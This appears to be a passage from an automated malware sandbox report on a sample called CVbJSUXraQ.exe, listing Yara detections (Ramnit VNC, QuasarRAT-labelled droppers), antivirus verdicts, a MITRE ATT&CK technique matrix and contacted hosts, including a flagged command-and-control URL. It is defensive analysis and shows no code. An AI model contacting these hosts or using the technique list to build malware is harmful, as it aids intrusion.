Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Yara detected Ramnit VNC Module

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: dropped/vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp	String found in binary or memory: RFB 003.008
Source: vnc.exe	String found in binary or memory: RFB 003.008
Source: vnc.exe, 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp	String found in binary or memory: RFB 003.008
Source: svchost.exe	String found in binary or memory: RFB 003.008
Source: svchost.exe	String found in binary or memory: RFB 003.008
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	String found in binary or memory: RFB 003.008
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: RFB 003.008

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Native API11	Application Shimming1	Exploitation for Privilege Escalation1	Disable or Modify Tools1	Input Capture21	System Time Discovery1	Remote Desktop Protocol1	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job1	Create Account1	Application Shimming1	Deobfuscate/Decode Files or Information1	LSASS Memory	Peripheral Device Discovery11	Replication Through Removable Media1	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Scheduled Task/Job1	Process Injection612	Obfuscated Files or Information21	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Input Capture21	Automated Exfiltration	Non-Standard Port11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Registry Run Keys / Startup Folder1	Scheduled Task/Job1	Software Packing1	NTDS	File and Directory Discovery2	Distributed Component Object Model	Clipboard Data2	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	Masquerading11	LSA Secrets	System Information Discovery35	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol3	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion21	Cached Domain Credentials	Query Registry1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol14	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection612	DCSync	Security Software Discovery131	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Virtualization/Sandbox Evasion21	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Process Discovery3	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Application Window Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Owner/User Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	Remote System Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	Masquerade Task or Service	GUI Input Capture	System Network Configuration Discovery1	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CVbJSUXraQ.exe	74%	Virustotal		Browse
CVbJSUXraQ.exe	69%	Metadefender		Browse
CVbJSUXraQ.exe	87%	ReversingLabs	Win32.Trojan.Pwsx
CVbJSUXraQ.exe	100%	Avira	TR/Spy.Agent.zgvfh
CVbJSUXraQ.exe	100%	Avira	TR/AutoIt.tyemd

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\windef.exe	100%	Avira	TR/AD.Xiclog.nmpoi
C:\Users\user\btpanui\SystemPropertiesPerformance.exe	100%	Avira	TR/Spy.Agent.zgvfh
C:\Users\user\btpanui\SystemPropertiesPerformance.exe	100%	Avira	TR/AutoIt.tyemd
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	100%	Avira	TR/AD.Xiclog.nmpoi
C:\Users\user\AppData\Local\Temp\vnc.exe	100%	Avira	TR/Hijacker.W
C:\Users\user\AppData\Local\Temp\windef.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\vnc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\vnc.exe	84%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\vnc.exe	93%	ReversingLabs	Win32.Trojan.Carberp
C:\Users\user\AppData\Local\Temp\windef.exe	86%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\windef.exe	93%	ReversingLabs	ByteCode-MSIL.Backdoor.QuasarRAT
C:\Users\user\AppData\Roaming\SubDir\winsock.exe	93%	ReversingLabs	ByteCode-MSIL.Backdoor.QuasarRAT

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.0.svchost.exe.c60000.0.unpack	100%	Avira	HEUR/AGEN.1122256	Download File
5.0.svchost.exe.c60000.3.unpack	100%	Avira	HEUR/AGEN.1122256	Download File
7.2.CVbJSUXraQ.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	100%	Avira	TR/Hijacker.W	Download File
10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
5.2.svchost.exe.c60000.0.unpack	100%	Avira	HEUR/AGEN.1122256	Download File
6.0.windef.exe.f10000.0.unpack	100%	Avira	HEUR/AGEN.1135947	Download File
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	100%	Avira	TR/Hijacker.W	Download File
10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
4.0.vnc.exe.ab0000.0.unpack	100%	Avira	TR/Hijacker.Gen	Download File
7.2.CVbJSUXraQ.exe.db0000.1.unpack	100%	Avira	TR/Hijacker.W	Download File
7.2.CVbJSUXraQ.exe.db0000.1.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
4.2.vnc.exe.ab0000.0.unpack	100%	Avira	TR/Hijacker.Gen	Download File
7.0.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/Hijacker.W	Download File
7.0.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
1.3.CVbJSUXraQ.exe.3800000.6.unpack	100%	Avira	TR/AD.MoksSteal.elw	Download File
5.0.svchost.exe.c60000.6.unpack	100%	Avira	HEUR/AGEN.1122256	Download File
1.2.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/Hijacker.W	Download File
1.2.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
1.0.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/Hijacker.W	Download File
1.0.CVbJSUXraQ.exe.db0000.0.unpack	100%	Avira	TR/AD.Xiclog.nmpoi	Download File
6.2.windef.exe.f10000.0.unpack	100%	Avira	HEUR/AGEN.1135947	Download File
10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack	100%	Avira	TR/AD.MoksSteal.elw	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://0x21.in:8000/_az/	6%	Virustotal		Browse
http://0x21.in:8000/_az/	0%	Avira URL Cloud	safe
http://ip-api.com40l	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
https://dotbit.me/a/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
0x21.in	50.17.5.224	true	false		high
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://0x21.in:8000/_az/	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/json/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/	windef.exe	false		high
http://freegeoip.net/xml/	CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	false		high
http://ip-api.com40l	windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.datacontract.org/2004/07/	windef.exe, 00000006.00000002.713962745.00000000033C3000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	false		high
http://api.ipify.org/3	CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	false		high
http://ip-api.com/json	CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	false		high
http://ip-api.com	windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	false		high
https://dotbit.me/a/	CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

